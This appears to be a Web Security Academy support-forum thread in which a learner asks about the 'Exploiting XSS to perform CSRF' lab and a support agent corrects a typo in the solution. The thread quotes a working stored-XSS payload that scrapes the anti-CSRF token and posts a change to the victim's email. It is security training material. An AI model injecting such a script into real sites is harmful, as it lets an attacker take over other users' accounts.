Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

Web Secuirty Academy- Exploiting XSS to perform CSRF

Pelumi Magbagbeola Jun 06, 2019 10:02PM UTC

I am having trouble determing where to put the token within the payload given in the solution:

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
Is it supposed to be replace (\w+)?


Paul Johnston Jun 10, 2019 11:02AM UTC Support Center agent

That code will automatically fetch the anti-CSRF token and include it in the second request.

Try submitting it as a blog comment. If that doesn’t work, drop us a line.


Pelumi Magbagbeola Jun 11, 2019 12:57AM UTC
I've tried multiple times to submit the code as a blog comment but I keep getting the 'Thank you for your comment' page with the lab unsolved.

Pelumi Magbagbeola Jun 11, 2019 01:53AM UTC
I copied the code and inserted into a blog comment verbatim.

Paul Johnston Jun 11, 2019 01:58PM UTC Support Center agent

We’ve just spotted there is a typo in the solution the line:

changeReq.open('post', '/email', true);

should be:

changeReq.open('post', '/email/change', true);

We will get this fixed in the coming days, but for now you can manually do this.


Pelumi Magbagbeola Jun 11, 2019 02:19PM UTC
Thanks much.

Post Your public answer

Your name
Your email address
Answer